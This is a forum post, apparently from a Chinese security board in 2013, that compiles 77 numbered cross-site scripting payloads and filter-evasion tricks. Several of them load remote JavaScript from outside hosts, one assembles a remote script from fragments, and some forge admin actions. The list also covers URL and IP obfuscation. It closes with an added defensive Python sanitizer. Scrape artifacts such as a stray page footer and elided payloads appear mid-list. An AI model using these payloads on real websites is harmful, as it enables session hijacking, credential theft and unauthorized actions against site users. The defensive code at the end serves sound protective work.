XSS Attack Compilation

OP
Posted on 2013-4-19 19:22:37
It seems t00ls has relatively little material on XSS, so when I saw this good stuff I copied it over; not sure whether any of you need to bookmark it.
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(3) IMG tag with no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>
(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>
(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>
(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>
(9) 7-digit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>
(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=&#x6A&#x61&#x76&#x61..omitted..&#x58&#x53&#x53&#x27&#x29>
(11) Embedded tab to break up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(12) Embedded encoded tab to break up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">
(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">
(15) Multi-line embedded JavaScript injection; an extreme XSS example
<IMG SRC="javascript:alert('XSS')">
(16) Working around a character limit (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
(17) Null characters
12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
(18) Null characters 2; null characters basically have no effect domestically, because there is nowhere to make use of them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(19) IMG tag with spaces and meta characters before the JavaScript
<IMG SRC=" javascript:alert('XSS');">
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(21) Non-alpha-non-digit XSS, part 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
(22) Non-alpha-non-digit XSS, part 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>
(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"
(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <
(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29) Escape-filtered JavaScript
\";alert('XSS');//
(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) Input Image
<INPUT SRC="javascript:alert('XSS');">
(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">
(33) BODY tag
<BODY('XSS')>
(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">
(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">
(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">
(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">
(39) List-style-image (list style)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS
(41) META with a URL link
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">
(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">
(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression(alert('XSS'))">
(50) Anonymous STYLE (made up of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">
(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
(52) IMG STYLE method
exppression(alert("XSS"))'>
(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
(54) BASE
<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag: you can embed Flash that contains XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>
(56) Using ActionScript in Flash you can sneak your XSS code in
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);
(57) XML namespace; the .HTC file must be on the same server as your XSS payload
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
(58) If your JS is filtered, you can put the JS code inside an image to exploit it
<SCRIPT SRC=""></SCRIPT>
(59) IMG embedded command, can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">
(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61) Getting around symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>
(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>
(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>
(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>
(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>
(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>
(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>
(69) URL encoding
<A HREF="http://3w.org">XSS</A>
(70) IP in decimal
<A HREF="http://3232235521">XSS</A>
(71) IP in hexadecimal
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>
(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>
(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>
(74) Dropping the [http:]
<A HREF="//www.google.com/">XSS</A>
(75) Dropping the [www]
<A HREF="http://google.com/">XSS</A>
(76) Absolute dot, absolute DNS
<A HREF="http://www.google.com./">XSS</A>
(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>

Original source: http://fuzzexp.org/u/0day/?p=14
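As an added, defender-side example (not part of the original post or its source): a Python normalizer that undoes the decodings the tricks above rely on (HTML character references with or without semicolons, embedded tabs, newlines and NULs, leading whitespace, mixed case) before checking a URL attribute's scheme against an allowlist, plus a canonicalizer for the decimal, hex and octal IP spellings in items 70 to 72. The function names and the scheme allowlist are this example's own assumptions.

```python
import html
import re

# Added example, not from the original post: normalize a user-supplied
# href/src the way a browser would before deciding whether to keep it.
# The scheme allowlist is this example's own policy (an assumption).
ALLOWED_SCHEMES = {"http", "https", "mailto"}
_SCHEME_RE = re.compile(r"^([a-z][a-z0-9+.\-]*):")


def normalize_url_attr(value: str) -> str:
    """Undo the decodings a browser applies to a URL attribute value."""
    # HTML5 character references, including &#x6A / &#106 with no semicolon.
    decoded = html.unescape(value)
    # Drop NULs, embedded tabs/newlines/CRs and other C0 controls anywhere
    # (java\0script, jav<TAB>ascript), then outer whitespace and case.
    decoded = re.sub(r"[\x00-\x1f\x7f]", "", decoded)
    return decoded.strip().lower()


def is_safe_url_attr(value: str) -> bool:
    """True if the value is a relative URL or uses an allowed scheme."""
    m = _SCHEME_RE.match(normalize_url_attr(value))
    return m is None or m.group(1) in ALLOWED_SCHEMES


def canonical_ipv4(host: str):
    """Rewrite dword, hex and octal host spellings as dotted decimal; else None."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    nums = []
    for p in parts:  # same per-part radix rules as the WHATWG IPv4 parser
        try:
            if p[:2].lower() == "0x":
                nums.append(int(p[2:], 16))
            elif len(p) > 1 and p[0] == "0":
                nums.append(int(p, 8))
            else:
                nums.append(int(p))
        except ValueError:
            return None  # not an IPv4 literal (e.g. a domain name)
    last = nums.pop()  # the last part fills all remaining bytes
    if any(not 0 <= n <= 255 for n in nums) or not 0 <= last < 256 ** (4 - len(nums)):
        return None
    value = last + sum(n << (8 * (3 - i)) for i, n in enumerate(nums))
    return ".".join(str((value >> s) & 255) for s in (24, 16, 8, 0))
```

Run the allowlist check on the normalized value, never on the raw one, and compare hosts only after canonicalization so that 3232235521, 0xc0.0xa8.0x00.0x01 and 0300.0250.0000.0001 all resolve to the same entry.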